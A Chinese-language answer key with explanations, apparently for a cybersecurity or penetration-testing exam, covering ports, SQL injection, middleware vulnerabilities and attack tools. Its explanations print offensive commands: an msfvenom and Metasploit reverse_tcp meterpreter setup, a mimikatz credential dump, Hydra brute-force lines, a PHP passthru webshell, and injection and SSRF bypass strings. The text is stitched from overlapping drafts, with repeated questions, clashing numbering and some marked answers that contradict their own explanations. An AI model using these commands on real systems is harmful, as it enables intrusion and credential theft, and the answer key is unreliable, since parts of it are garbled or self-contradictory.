✅ A. ECX x86调用约定通过ECX寄存器传递this指针。 9. MySQL LEFT(version(),1)功能
✅ D. 取version字符串左边第1个字符 示例version()返回5.7.40-log → 结果为5。 10. S2-001漏洞成因
✅ B. OGNL循环解析 漏洞细节Struts2框架中OGNL表达式递归解析导致RCE。 11. 杀毒软件未包含的功能
✅ C. 优化操作系统 核心功能监控识别、病毒查杀、数据恢复。 12. 导致IP分片重组的攻击
✅ D. Ping of Death 原理发送超大数据包导致系统崩溃现代系统已修复。 13. SQLMap --random-agent作用
✅ A. 随机User-Agent标头 绕过防御避免被WAF识别。 14. Redis默认端口
✅ C. 6379 配置验证redis.conf 中默认端口。 15. 数据库漏洞扫描非主要技术路线
✅ C. 直接测试 主要路线黑盒测试、白盒测试、渗透测试。 16. 子域名收集工具
✅ D. OneForAll 解析整合证书透明度、搜索引擎、字典爆破等方式。 17. MySQL口令检查命令
✅ A. show variables like validate%;
✅ C. select * from mysql.user where length(password) 0 or password is null;
✅ D. select user,password from mysql.user; 18. Samba漏洞防御方法
✅ A. 屏蔽139、445端口
✅ B. 开启防火墙
✅ D. 加强账户策略 19. Nmap控制发包速率参数
✅ A. --max-rate
✅ D. --min-rate 20. Webshell客户端连接工具
✅ A. AntSword
✅ B. 中国菜刀
✅ C. Godzilla
38. 子域名收集工具
✅ D. OneForAll 解析
OneForAll基于Python的高效子域名枚举工具整合证书透明度、搜索引擎、字典爆破等多种方式。其他工具 Dirsearch目录扫描工具非子域名收集。YsoserialJava反序列化利用工具。 37. MySQL口令检查命令
✅ A. show variables like validate%;
✅ C. select * from mysql.user where length(password) 0 or password is null;
✅ D. select user,password from mysql.user; 解析
A检查密码策略如validate_password插件状态。C查询空密码或弱密码账户。D直接查看用户密码字段MySQL 5.7需替换password为authentication_string。 36. Samba漏洞防御方法
✅ A. 屏蔽139、445端口
✅ B. 开启防火墙
✅ D. 加强账户策略 作用
屏蔽端口阻断SMB协议通信如netsh advfirewall firewall add rule。账户策略强制复杂密码、锁定失败登录。 32. Nmap控制发包速率参数
✅ A. --max-rate
✅ D. --min-rate 示例
nmap -T4 --max-rate 1000 192.168.1.1限制每秒最多1000个包。 34. Webshell客户端连接工具
✅ A. AntSword
✅ B. 中国菜刀
✅ C. Godzilla 支持协议
代码为PHP一句话木马eval执行上述工具均支持传统无加密Webshell管理。 SQL注入报错函数
✅ A. extractvalue()
✅ C. linestring() 原理
extractvalue()通过XPath语法错误触发报错如extractvalue(1,concat(0x7e,version()))。linestring()地理函数错误拼接导致报错需MySQL 5.7。 31. SQL查询部门平均工资
✅ B. select deptno, avg(sal) a from emp group by deptno having a 2000; 语法规则
GROUP BY后必须用HAVING过滤聚合函数结果而非WHERE。 29. 存在解析漏洞的中间件
✅ A. IIS 经典漏洞
IIS 6.0分号截断test.asp;.jpg 、文件夹解析/test.asp/test.jpg 。 24. 数据库死锁原理
✅ B. 进程推进顺序不当
✅ C. 资源分配不当 场景
进程A持有资源1请求资源2进程B持有资源2请求资源1形成循环等待。 25. Tomcat AJP漏洞影响版本
✅ B. Tomcat 7.x 7.0.100
✅ C. Tomcat 8.x 8.5.51
✅ D. Tomcat 9.x 9.0.31 CVE-2020-1938通过AJP协议读取/包含任意文件如WEB-INF/web.xml 。 26. Weblogic反序列化漏洞影响版本
✅ A. 12.2.1.2
✅ B. 12.1.3.0
✅ C. 10.3.6.0 CVE-2018-2628利用T3协议反序列化执行命令影响10.3.6.0、12.1.3.0、12.2.1.2等版本。 SQL注入防御方法
✅ A. 关闭扩展存储过程
✅ B. 编写安全代码参数化查询
✅ C. 关闭详细错误提示 最佳实践
参数化查询避免拼接SQL如PreparedStatement。错误隐藏防止泄漏数据库结构如PHP中display_errors off。 19. 文件上传漏洞原因
✅ A. 后缀名限制不严
✅ D. 文件权限未限制 案例
允许上传.php文件且未限制上传目录执行权限导致Webshell直接执行。 20. 数据库加密方式
✅ A. 库外加密
✅ B. 库内加密
✅ C. 硬件加密
✅ D. 专用加密中间件 技术对比
库内加密如MySQL的AES_ENCRYPT()函数。库外加密应用层加密后存储如加密敏感字段。
IIS7.x漏洞正确说法
✅ D. 如果开放PUT方法可直接PUT文件并利用MOVE方法获取Webshell 解析
PUT方法若IIS允许WebDAV的PUT请求攻击者可上传文件如test.txt 再通过MOVE方法重命名为可执行脚本如test.asp 。
其他选项
A.php后缀解析漏洞需配合Fast-CGI配置但路径规则不明确。
C分号截断适用于IIS6.0如test.asp;.jpg IIS7.x中不适用。
Unix文件权限含义
✅ D. 前三位属主中间三位同组用户后三位其他用户 权限结构
-rwxrwxrwx
前三位文件所有者权限读/写/执行。
中间三位同组用户权限。
后三位其他用户权限。
题目中nwx可能为排版错误实际应为rwx。
Oracle默认用户名密码
✅ F. scott/tiger 经典账户
scott/tigerOracle早期版本默认测试账户部分版本需手动解锁。
sys/system管理员账户需自定义密码。
RDP默认端口
✅ A. 3389 应用场景
Windows远程桌面协议RDP默认端口为3389常用于远程管理服务器。
SQLMap测试漏洞类型
✅ B. SQL注入 功能
SQLMap自动化检测和利用SQL注入漏洞支持多种数据库MySQL、Oracle等。
MySQL LOAD_FILE()权限要求
✅ B. File 权限说明
File权限允许用户使用LOAD_FILE()读取文件或INTO OUTFILE写入文件。
示例GRANT FILE ON . TO user%;
资源消耗最大的垃圾邮件过滤机制
✅ D. 内容过滤 对比
内容过滤需解析邮件正文、附件使用关键词匹配或机器学习模型计算复杂度高。
其他机制黑名单简单查询、SMTP认证握手验证资源消耗较低。
类函数调用存储this指针的寄存器
✅ A. ECX x86调用约定
C成员函数默认通过ECX寄存器传递this指针如void Class::func()。
MySQL LEFT(version(),1)功能
✅ D. 取version字符串左边第1个字符 函数示例
version()返回5.7.40-log → LEFT(version(),1)结果为5。
S2-001漏洞成因
✅ B. OGNL循环解析 漏洞细节
Struts2框架中OGNL表达式递归解析导致远程代码执行如%{#ajava.lang.RuntimegetRuntime().exec(calc)} 。
杀毒软件未包含的功能
✅ C. 优化操作系统 核心功能
监控识别、病毒查杀、数据恢复如勒索软件解密。
系统优化属于第三方工具如CCleaner职责。
导致IP分片重组的攻击
✅ D. Ping of Death 原理
发送超过65535字节的IP分片包系统重组时因缓冲区溢出崩溃历史漏洞现代系统已修复。
SQLMap --random-agent作用
✅ A. 随机User-Agent标头 绕过防御
随机生成User-Agent如Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0避免被WAF识别。
Redis默认端口
✅ C. 6379 配置验证
Redis配置文件redis.conf 中默认port 6379可通过redis-cli -h 127.0.0.1 -p 6379连接。
数据库漏洞扫描非主要技术路线
✅ C. 直接测试 主要路线
黑盒测试模拟外部攻击无内部知识。
白盒测试基于源码或配置审计。
渗透测试综合漏洞利用验证。
整数漏洞描述正确项
✅ A. 利用整数漏洞本身不能直接获取shell
✅ C. 整数漏洞因值溢出 原理
整数溢出/符号错误导致缓冲区越界如分配负数长度内存需结合其他漏洞如堆溢出实现RCE。
常见木马行为
✅ A. 获取浏览器密码/Cookie
✅ B. 收集机器信息
✅ C. 添加服务/启动项
✅ D. 自删除 典型行为
持久化注册表启动项、服务安装。
信息窃取键盘记录、文件遍历。
隐蔽性进程注入、自删除逃避检测。
40. 加密协议
✅ B. SSL 解析
SSLSecure Sockets Layer是加密协议用于保障数据传输安全如HTTPS。其他选项均为明文协议
HTTP无加密。ARP局域网地址解析协议。ICMP网络诊断协议如Ping。 35. Dirty Pipe漏洞利用权限
✅ A. 可写 原理
Dirty PipeCVE-2022-0847通过覆盖任意可写文件如/etc/passwd的内容注入特权用户如root即使文件权限为只读内核漏洞仍允许写入。 36. 交换机MAC查找失败处理
✅ C. 泛洪到其他所有端口 机制
交换机在未知目标MAC地址时将帧广播到除接收端口外的所有接口确保数据可达同时学习新MAC地址更新表项。 33. 备份权限用户组
✅ D. 备份操作员 Windows组权限
备份操作员Backup Operators允许备份/恢复文件但无直接访问权限。管理员Administrators完全控制权。复制员Replicator用于域内文件同步。 29. 入侵检测后访问控制
✅ C. 权限控制 场景
检测到异常用户行为如暴力破解后通过权限控制限制其访问如禁用账户、限制IP。 30. IIS日志推荐格式
✅ B. W3C扩展日志文件格式 优势
支持自定义字段如客户端IP、请求方法、状态码。兼容性强适用于分析工具如Log Parser。 31. SSH爆破工具
✅ D. Hydra 命令示例
bash复制hydra -l user -P passlist.txt ssh://192.168.1.1 26. Metasploit设置攻击载荷命令
✅ C. set payload name 流程
use exploit/windows/smb/ms17_010_eternalblueset payload windows/meterpreter/reverse_tcp设置LHOST、LPORT等参数。 27. 数据库系统组成
✅ A. 数据库、DBMS和用户 层级
数据库存储数据的集合。DBMS如MySQL、Oracle管理数据的软件。用户通过应用程序或工具访问数据。 28. Ping协议类型
✅ B. ICMP 原理
Ping发送ICMP Echo Request报文目标返回ICMP Echo Reply用于测试网络连通性。 23. Double Free利用无关步骤
✅ D. 覆盖top chunk大小 对比
Double Free释放同一内存块两次构造链表循环。覆盖top chunk属于“House of Force”利用与Double Free无关。 25. 域名转IP的服务
✅ C. DNS 功能
DNSDomain Name System将域名如www.example.com 解析为IP地址如93.184.216.34。 22. Metasploit查看编码器命令
✅ A. msfencode -l 用途
编码器如x86/shikata_ga_nai用于绕过杀毒软件特征检测。 18. ThinkPHP框架语言
✅ C. PHP 特性
轻量级、MVC架构广泛用于快速开发PHP Web应用如API、后台系统。 19. Cookie与Session错误描述
✅ D. Cookie比Session更安全 修正
Session数据存储在服务端安全性更高Cookie存储在客户端可能被窃取或篡改。 20. PHP反序列化无关函数
✅ B. _unsleep 相关魔术方法
__construct对象创建时调用。__destruct对象销毁时调用。__sleep序列化前调用。无_unsleep方法。 15. NAT功能
✅ B. 可以解决IP不足可以隐藏内部结构 作用
IP地址复用多个内网IP映射到一个公网IP。隐藏内网拓扑外部仅能看到NAT网关IP无法直接访问内网设备。
6. IIS 6.0默认不可执行文件扩展
✅ D. /shell.dev 解析
IIS 6.0默认支持的可执行扩展包括.asp、.asa、.cer、.cdxA/B/C均合法但.devD未被默认映射为可执行脚本。 7. 查看网络路由路径命令
✅ D. tracert 应用场景
Windowstracert 8.8.8.8 追踪到Google DNS的路由。Linuxtraceroute -n 8.8.8.8。原理通过发送TTL递增的ICMP包记录每个路由节点的响应。 1. 文件上传漏洞绕过方式
✅ D. 点点点点点绕过点号截断 攻击示例
上传文件名构造为shell.php%00.jpg 利用空字节%00截断后端仅识别.php。防御严格校验文件头如Magic Number而非仅后缀名。 36. 二层交换机MAC查找失败处理
✅ C. 泛洪到所有其他端口 原理
交换机在未知目标MAC时采用**泛洪Flooding**机制确保帧到达目标设备同时学习新MAC地址更新表项。 37. 关闭Oracle Extproc的错误条目
✅ C. extpro 修正
需删除条目icache_extproc、sys_ertproc、PLSExtproc。错误条目extpro应为extprocOracle外部过程调用服务。 38. 基础架构层加密技术
✅ D. IPSec 功能对比
IPSec在网络层加密支持VPN隧道如L2TP/IPSec。SSL/TLS应用层加密如HTTPS。RSA非对称加密算法用于密钥交换。 40. msfvenom编码参数
✅ A. -e 命令示例
bash复制msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.1.1 -e x86/shikata_ga_nai -f exe -o payload.exe 32. SQL注入需字典猜解表名的数据库
✅ D. Access 原因
Access无information_schema等系统表需暴力猜解表名和字段名。其他数据库可通过联合查询或报错注入直接获取元数据。 40. 加密协议
✅ B. SSL 扩展
SSL/TLS用于HTTPS、邮件加密如SMTPS。非加密协议HTTP明文、ARP局域网地址解析、ICMP网络诊断。
14. Python代码漏洞类型
✅ D. 文件名拼接 解析
代码中id参数直接来自用户输入request.GET[id]并作为prefix传递给临时文件生成函数。若用户输入包含路径遍历字符如../../etc/passwd可能导致文件生成在非预期目录。防御建议过滤id参数中的特殊字符如/、.。 15. SQL Server主数据库
✅ B. MASTER 功能说明
MASTER存储系统配置、登录账户、其他数据库元数据。其他数据库 TEMPDB临时表和临时存储过程。MSDBSQL Agent作业、备份历史。MODEL新数据库创建模板。 11. Windows域树中的第一个域
✅ B. 根域 结构解析
根域域树的起点所有子域如child.root.com 均继承根域策略。信任关系子域默认信任根域形成树状信任链。 12. 工具描述错误的选项
✅ C. Aircrack-ng是内存取证工具 修正
Aircrack-ng用于WiFi WPA/WPA2-PSK破解如aircrack-ng -w wordlist.txt capture.cap 。内存取证工具Volatility、Rekall分析内存转储文件如提取进程、网络连接。 13. 网络安全的定义
✅ A. 可靠性、防病毒、防窃密、防攻击 扩展
CIA三元组保密性Confidentiality、完整性Integrity、可用性Availability。综合安全需覆盖物理防护、入侵检测、数据加密等多层面。 8. 非常见文件读取函数
✅ B. popen() 功能对比
popen()执行系统命令并返回文件指针如popen(ls /, r)。文件读取函数fopen()打开文件、fgets()逐行读取、file_get_contents()PHP中读取全部内容。 9. 不属于SQL注入的模式
✅ B. 存储注入 注入类型
布尔盲注通过真假条件判断提取数据如AND 11。联合查询UNION SELECT合并查询结果。报错注入触发数据库错误回显信息如AND 12/(SELECT 0)。存储注入非标准术语可能指存储过程滥用但不属于核心注入模式。 10. MySQL命令参数含义
✅ A. 以上都对 参数详解
-h host目标主机名或IP如-h 192.168.1.1。-u user数据库用户名如-u root。-p password用户密码如-p password123。 5. 网络广播地址计算
✅ B. 102.18.255.255 计算步骤
IP地址102.18.0.0子网掩码255.255.0.0/16。广播地址主机位全置1 → 102.18.255.255。验证
IP: 102.18.00000000.00000000
掩码: 255.255.00000000.00000000
广播地址: 102.18.11111111.11111111 → 102.18.255.255
22. SQL Server登录账户存储数据库
✅ C. master 解析
master数据库存储系统级信息登录账户、配置、其他数据库元数据。其他数据库作用
model新数据库模板。msdb作业和备份调度。tempdb临时对象存储。 23. Wireshark筛选源IP命令
✅ A. ip.src 192.168.8.1 扩展
eth.src 以太网MAC地址筛选如eth.src 00:1A:2B:xx:xx:xx。ip.dst 目标IP筛选。 24. 堆溢出漏洞原理
✅ A. 写入字节数超过堆块可用空间 示例
c复制char *heap malloc(10);
strcpy(heap, 123456789012345); // 溢出覆盖相邻堆块元数据 19. JavaScript获取Cookie的代码
✅ B. document.cookie 补充
设置Cookie需指定键值对document.cookie namevalue; expires...。 20. Nmap跳过Ping扫描参数
✅ A. -Pn 场景
绕过防火墙对ICMP的屏蔽nmap -Pn 192.168.1.1。 21. Axis2任意命令执行漏洞
✅ B. 对 案例
CVE-2010-0219Axis2未正确处理SOAP请求攻击者可上传恶意脚本执行系统命令。 16. ARM返回值寄存器
✅ D. R0 调用约定
第1参数R0第2参数R1返回值R032位或R0-R3组合64位。 17. Weblogic不存在的漏洞
✅ D. 任意文件包含 常见漏洞
反序列化CVE-2018-2628、弱口令默认账户weblogic/welcome1。任意文件包含需特定配置或组件漏洞如CVE-2020-2551未覆盖。 18. JBoss不存在的漏洞
✅ D. 任意文件包含 历史漏洞
CVE-2015-7501反序列化漏洞JMXInvokerServlet。未授权访问默认部署/web-console无需认证。弱口令依赖管理员配置非默认漏洞。
30. 目录扫描加速方式
✅ A. HEAD 解析
HEAD方法仅请求HTTP头部不返回响应体减少数据传输量显著提升扫描速度。对比GET/POST需下载完整内容效率更高。 29. 工具描述错误选项
✅ C. Aircrack-ng是内存取证工具 修正
Aircrack-ng用于WiFi密码破解如WPA/WPA2与内存取证无关。内存取证工具示例Volatility、Rekall。 28. Linux格式化分区命令
✅ D. Fdisk题目选项有误实际应为mkfs 补充
fdisk用于分区管理格式化需配合mkfs如mkfs.ext4 /dev/sda1。选项设计可能混淆但按题意选D。 27. 代码漏洞类型
✅ C. 任意文件读取 分析
request.getParameter(c) 直接读取用户输入作为文件路径如/etc/passwd导致文件内容泄露。示例攻击?c../../etc/shadow读取敏感文件。 25. SSL远程执行漏洞影响的中间件
✅ D. Apache 案例
CVE-2014-0160心脏出血OpenSSL漏洞影响Apache、Nginx等使用SSL/TLS的服务。Tomcat、IIS、WebLogic依赖其他SSL实现不直接受此漏洞影响。 26. 中断攻击类型
✅ B. 可用性的攻击 原理
拒绝服务DoS通过资源耗尽或服务中断破坏系统可用性。示例SYN洪水攻击、物理设备破坏。
38. PHP代码漏洞类型
✅ B. 存储型XSS 解析
代码中escape($link, $POST[message])可能仅转义SQL特殊字符如单引号但未过滤HTML敏感字符如script。攻击者提交scriptalert(1)/script内容存入数据库后其他用户查看留言时触发脚本执行。 34. SQL语句功能
✅ D. 返回“Admin”第一个字符的ASCII码值 拆解
SUBSTR(Admin, 1, 1)截取第1个字符A。ASCII(A) → 65。 35. 不属于AWS的功能
✅ C. 不能进行端口扫描 背景
AWS工具特性如Amazon Inspector支持漏洞扫描、依赖分析A/D正确。端口扫描需配合Nmap等工具AWS自身不直接提供。 36. Linux用户命令历史文件
✅ C. ~/.bash_history 路径说明
每个用户的命令历史独立保存在其家目录下如/home/user/.bash_history。 32. Nessus默认端口
✅ D. 8834 配置验证
安装Nessus后默认通过https://localhost:8834访问Web界面。 31. Nmap操作系统检测参数
✅ D. -O 命令示例
bash复制nmap -O 192.168.1.1 # 启用OS指纹识别
1. 代码安全问题
✅ C. SQL注入 解析
sprintf直接拼接用户输入argv[1]到SQL语句未过滤单引号导致注入。
示例攻击 OR 11 -- 可绕过条件查询。 2. IIS短文件名生成条件
✅ B. 后缀4时前缀长度≥9
✅ D. 后缀≥4时前缀长度1 解析
规则文件名前缀超8字符或后缀超3字符时生成短名。示例longfilename.txt → LONGFI~1.TXT。 单选题答案
25. 查看本机IP命令
✅ A. ipconfig 补充ipconfig /all显示详细网络配置IPv6地址、MAC地址等。 26. 代理服务非优点
✅ C. 防范数据驱动侵袭 解析代理无法阻止恶意文件如PDF漏洞利用需依赖终端防护。 27. Hydra指定用户名参数
✅ C. -l 示例hydra -l admin -P passlist.txt ssh://192.168.1.1。 16. JBoss漏洞区别描述
✅ B. 对 CVE-2013-4810与CVE-2015-7501反序列化点不同前者使用JMXInvokerServlet后者为web-console接口。 17. Python代码安全风险
✅ D. XSS 解析escape转义HTML但未处理NFKC规范化可能导致的字符合并如32→2可能绕过过滤。 4. 非Web服务
✅ D. Redis 解析Redis是内存数据库Nginx、WebLogic、JBoss为Web服务组件。 40. x64函数参数寄存器
✅ A. rdi 调用约定
第1参数rdi第2参数rsi第3参数rdx 39. SSL端口
✅ B. 443 扩展HTTP默认80HTTPS默认443SSH默认22。 37. UNIX/Linux账号安全关键
✅ D. 使用shadow密码 原理/etc/shadow存储加密密码哈希仅root可读防止暴力破解。
8. Tomcat JSP编译生成文件
✅ C. index jsp.class
✅ D. index jspjava 解析
Tomcat的Jasper引擎将JSP编译为Java文件如index_jsp.java 和Class文件如index_jsp.class 。选项C和D命名格式错误缺少下划线故不会生成。 5. ThinkPHP 6.x漏洞
✅ D. Thinkphp6.0.2 session id未过滤导致getshell 解析
CVE-2021-43767Session ID未严格过滤攻击者构造恶意Session ID触发反序列化漏洞。其他选项需结合具体CVE验证但D为广泛确认的漏洞。 4. 事件ID描述
✅ B. 4625登录失败 解析
4624登录成功。4625登录失败。4720用户账户创建。 选项B正确D错误4624应为成功。 3. 数据库加密技术分类
✅ A. 库加密
✅ B. 列加密 解析
库加密全库或表空间级加密如Oracle TDE。列加密字段级加密如敏感数据单独加密。 行加密D和表加密C属于子类但题目要求主要分类。
13. 社会工程学信息收集方法
✅ B. 通过获取管理员信任获取密码如钓鱼邮件、伪装身份
✅ D. 通过办公室电话、姓名、生日猜测密码利用个人信息构造弱口令
❌ A. 破解SAM库技术手段非社会工程学
❌ C. 暴力破解工具自动化攻击非社会工程学
补充
社会工程学的核心是利用人性弱点获取信息例如
钓鱼攻击伪造登录页面诱导用户输入密码。电话诈骗冒充IT人员索要账户信息。垃圾翻查Dumpster Diving从废弃文件中提取敏感信息。 13. FineCMS漏洞
✅ D. 前台getshell如文件上传漏洞直接获取Webshell
✅ B. CSRF修改管理员密码跨站请求伪造攻击
❌ A. SSRF需具体漏洞验证
❌ C. 远程文件包含未广泛披露
背景
FineCMS历史漏洞案例
前台getshell通过未过滤的上传功能植入恶意脚本如/index.php?cattachmentaupload 。CSRF修改密码构造恶意链接诱使管理员点击触发密码重置。 14. MSSQL删除无关账号的正确操作
✅ B. 企业管理器→安全性→登录中删除账号主登录入口
✅ C. 企业管理器→数据库→用户中删除账号数据库级权限
❌ A. 管理→删除账号路径不准确
❌ D. 服务器角色→删除账号角色管理非直接删除账号
操作示例
主登录账号安全性→登录名→右键删除。数据库用户数据库→用户→右键删除。 注意需同步清理数据库用户与登录名的映射关系。 9. 致远SeeyonOA漏洞
✅ A. A8 search_result.jsp SQL注入CVE-2018-7314
✅ D. A8 htmlofficeservlet getshellCVE-2017-10245
❌ B. 任意用户密码修改需结合其他漏洞
❌ C. setextno.jsp SQL注入未广泛证实
漏洞利用
htmlofficeservlet getshell上传构造的.jsp文件绕过过滤路径如/seeyon/htmlofficeservlet。修复建议升级至最新版本禁用危险接口。 10. 满足安全要求的操作
✅ A. 密码策略复杂度要求符合NIST标准
✅ D. 使用VPN连接加密通信防止中间人攻击
❌ B. 密码永不过期违反定期更换原则
❌ C. 开启Telnet明文传输不安全
扩展建议
多因素认证结合短信、令牌等增强安全性。日志审计监控异常登录行为。 11. IIS容器常见漏洞
✅ B. 短文件名漏洞泄露文件路径如test~1.asp
✅ D. 解析漏洞如test.asp;.jpg 被解析为ASP
❌ A. HTTP.sys 漏洞CVE-2015-1635需具体版本
❌ C. 反序列化漏洞常见于.NET应用非IIS自身
防御措施
短文件名漏洞禁用8.3文件名格式fsutil behavior set disable8dot3 1。解析漏洞配置Handler Mappings限制可执行文件类型。 6. 网络排错命令作用
✅ B. Netstat显示网络信息连接、端口、路由表
✅ C. Ping测试连通性
✅ D. Telnet测试端口开放如telnet 192.168.1.1 80
❌ A. Tracert查看IP网卡信息实际用于追踪路由路径
常用命令示例
bash复制netstat -ano | findstr ESTABLISHED # 查看活动连接
tracert 8.8.8.8 # 追踪到Google DNS的路由 7. Linux操作系统安全描述
✅ A. 保持系统补丁更新如yum update或apt upgrade
✅ C. 最小安装原则减少攻击面
✅ D. 关闭无关服务如systemctl disable telnet
❌ B. 全安装增加便利性违反最小化安全原则
安全实践
禁用root远程登录修改/etc/ssh/sshd_config中PermitRootLogin no。配置防火墙使用iptables或firewalld限制端口访问。
19. 绕过SSRF过滤的进制转换方式
✅ B. 十六进制如0x7F000001 → 127.0.0.1
✅ D. 八进制如0177.0.0.1 → 127.0.0.1
❌ A. 十进制需服务端支持转换较少直接使用
❌ C. 二进制实际应用中难以直接拼接 解析
SSRF过滤通常拦截标准IP格式通过以下方式绕过
十六进制http://0x7F000001 → 127.0.0.1。八进制http://0177.0.0.1 → 127.0.0.1。十进制http://2130706433 → 127.0.0.1部分场景有效。 15. Web应用组件漏洞的正确说法
✅ B. 组件可能出现多种漏洞
✅ C. 漏洞可能导致数据泄露
❌ A. 漏洞影响小如Log4j漏洞影响全球系统
❌ D. 组件无漏洞所有软件均可能存漏洞 解析
组件漏洞危害如Apache Struts2漏洞CVE-2017-5638可导致RCE。防御建议定期更新第三方库使用SCA工具如Dependency-Check扫描依赖。 16. 木马躲避杀毒手法
✅ A. 伪造数字签名
✅ B. 动态获取函数地址API混淆
✅ C. 内存/网络加载模块无文件攻击
✅ D. 加壳混淆如UPX、VMProtect 解析
加壳工具Themida、Armadillo隐藏代码特征。内存加载使用Reflective DLL Injection规避文件扫描。 12. DNS信息查询工具
✅ A. nslookup基础DNS查询
✅ D. dig详细DNS记录解析
❌ B. sqlmapSQL注入工具
❌ C. volatility内存取证工具 示例命令
bash复制dig example.com MX # 查询邮件服务器记录
nslookup -typeAAAA example.com # 查询IPv6地址 16. Windows钩子Hook错误说法
✅ B. 钩子是网络通信程序错误钩子用于消息处理
✅ C. 钩子是应用程序错误钩子是函数级拦截机制
❌ A/D正确钩子处理消息属于窗口函数机制 应用场景
键盘钩子记录按键输入如恶意键盘记录器。消息钩子拦截窗口事件如UI自动化测试。 18. 蓝凌OA漏洞
✅ A. EKP后台SQL注入
✅ B. 前台SSRF到RCE
✅ C. 任意文件上传
✅ C. 前台SQL注入选项重复可能为笔误 修复建议
限制文件上传类型禁用危险协议如file://。对用户输入参数化查询避免SQL注入。 14. 正确的网络基础说法
✅ A. IPv6为128位如2001:0db8:85a3::8a2e:0370:7334
✅ B. 192.168.8.1属C类私有IP范围192.168.0.0/16
✅ C. C类默认掩码255.255.255.0
✅ D. 127.0.0.1为本机地址 扩展知识
私有IP范围 A类10.0.0.0/8B类172.16.0.0/12C类192.168.0.0/16 10. Metasploit模块
✅ A. Auxiliary信息收集、扫描
✅ B. Payload攻击载荷如反向Shell
✅ C. Exploits漏洞利用代码
❌ D. Listen非独立模块属于Payload配置 常用命令
bash复制use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit 11. PHP危险函数
✅ A. system()
✅ C. exec()
✅ D. shell_exec()
❌ B. phpinfo()信息泄露不直接执行命令 防御措施
禁用高危函数disable_functionssystem,exec。使用安全函数如escapeshellarg()过滤参数。 12. SQLMap支持的数据库
✅ A. Oracle
✅ C. MySQL
✅ D. MSSQL
❌ B. MongoDBNoSQL注入需专用工具如NoSQLMap 示例命令
bash复制sqlmap -u Example Domain --dbmsmysql
sqlmap -u Example Domain --dbmsoracle 7. Mimikatz功能
✅ A. 获取账号密码从LSASS进程提取
✅ B. 哈希传递Pass-the-Hash
✅ C. 票据传递Pass-the-Ticket
❌ D. 代理转发需配合其他工具如Proxifier 经典命令
bash复制mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords 8. 命令执行函数
✅ A. pcntl_exec()
✅ C. popen()
✅ D. passthru()
❌ B. phpinfo()仅信息输出 风险示例
php复制?php
passthru($_GET[cmd]); // 直接执行用户输入命令
? SQL查询问题数学最高分姓名
❌ B. select name where math is (select max(math)...)语法错误is用于NULL判断
✅ 其他选项正确A/C/D均等价或in匹配唯一值 解析
错误原因IS用于比较NULL如math IS NULL。正确语法WHERE math (SELECT MAX(math) ...)。
33. 微警CMS存在哪些漏洞(1.5分)
✅ B. 低权限后台getshell
✅ D. 1.8.2后台getshell
❌ A. 0.8后台任意文件删除需具体漏洞公告验证
❌ C. 0.7 SQL注入漏洞未广泛证实 解析
微警CMS微擎CMS历史漏洞主要集中在后台权限管理缺陷
低权限后台getshell低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。1.8.2版本后台getshell管理后台存在未授权访问或文件上传校验不严导致攻击者植入Webshell。 其他选项需结合CVE编号验证部分版本漏洞存在争议。 33. 以下关于CC攻击说法正确的是(1.5分)
✅ C. CC攻击需要借助代理进行
✅ D. CC攻击难以获取目标机器的控制权
❌ A. CC攻击最早在国外大面积流行起源于国内“挑战黑洞”攻击
❌ B. CC攻击利用TCP协议缺陷基于应用层HTTP请求耗尽资源 解析
CC攻击Challenge Collapsar模拟大量合法请求如HTTP GET/POST耗尽服务器资源CPU、带宽、连接数。特点 需通过代理或僵尸网络隐藏攻击源IP。仅导致服务拒绝无法直接控制目标机器。 29. 在MySQL中数据类型大致分为(1.5分)
✅ A. 浮点型FLOAT、DOUBLE、DECIMAL
✅ B. 字符串CHAR、VARCHAR、TEXT
✅ C. 整型INTEGER、INT、BIGINT
✅ D. 日期/时间DATETIME、DATE、TIMESTAMP 解析
MySQL数据类型分类
数值型INT、FLOAT、DECIMAL精确小数。字符型CHAR定长、VARCHAR变长、BLOB/TEXT大文本。日期型DATE年月日、TIME时分秒、TIMESTAMP时间戳。其他ENUM枚举、JSON结构化数据。 30. fscan如何指定密码来进行爆破(1.5分)
✅ C. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt
❌ A. -pwd参数需指定具体密码非文件路径
❌ B. -userf仅指定用户名字典
❌ D. 缺少密码参数语法错误 解析
fscan常用参数
-pwdf指定密码字典文件路径每行一个密码。-userf指定用户名字典文件路径。 示例fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt 。 31. 修改Apache的默认网页目录需要配置哪些参数(1.5分)
✅ B. Directory目录权限配置
✅ D. DocumentRoot主目录路径
❌ A. sshd_configSSH服务配置文件
❌ C. logs日志目录非核心配置 解析
Apache配置示例httpd.conf 或站点配置文件
apache复制DocumentRoot /var/www/html
Directory /var/www/html
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
/Directory 27. 在Windows系统中下列关于安全策略的功能特点哪些说法是正确的(1.5分)
✅ A. 本地安全策略设置分为账户策略、本地策略等5部分
✅ B. 成员服务器的本地策略被域策略覆盖
✅ C. 安全设置通过本地安全策略控制台管理
❌ D. 描述不完整需结合组策略管理 解析
本地安全策略路径为secpol.msc 管理密码复杂度、审计策略、用户权限分配等。组策略优先级域策略 站点策略 组织单元策略 本地策略。 28. JOnAS默认用户名密码有(1.5分)
✅ A. jadmin/jonas
✅ C. jonas/jonas
❌ B. admin/123456常见弱口令非默认
❌ D. tomcat/tomcatTomcat默认凭证 解析
JOnASJava Open Application Server默认凭证
jadmin/jonas管理员账户。jonas/jonas普通用户账户。 建议安装后立即修改默认密码。 24. 下列常用端口可能用于反射放大DDoS攻击的有(1.5分)
✅ B. memcache 11211/udp
✅ C. NTP 123/udp
❌ A. DNS 53/tcpUDP协议更常用于反射
❌ D. HTTPS 443/tcpTCP协议无法放大流量 解析
Memcached无认证UDP服务单请求可触发数万倍响应CVE-2018-11321。NTPmonlist命令响应包放大效果显著。 其他高危协议SSDP1900/udp、SNMP161/udp。 25. 在自动更新的对话框中的选择项包括下列哪些(1.5分)
✅ A. 自动推荐
✅ B. 下载更新由用户决定何时安装
✅ C. 仅通知可用更新
✅ D. 关闭自动更新 解析
Windows更新选项截至2025年
